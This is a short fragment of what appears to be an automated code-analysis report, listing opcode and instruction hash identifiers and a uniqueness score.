                                                                                        • Opcode ID: 0b95888bf63b718944a67c99bdfb08774048f4565fda277a6f0524d5c731caac
                                                                                        • Instruction ID: 27c910794fab9f5a49a007866265d8f2910574576d6b44454965cad18a3c64be
                                                                                        • Opcode Fuzzy Hash: 0b95888bf63b718944a67c99bdfb08774048f4565fda277a6f0524d5c731caac
                                                                                        • Instruction Fuzzy Hash: 94B09260A0910B8AE720EF90CA602AD76B1AF04384F100835A209A22C1CE3828008744
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%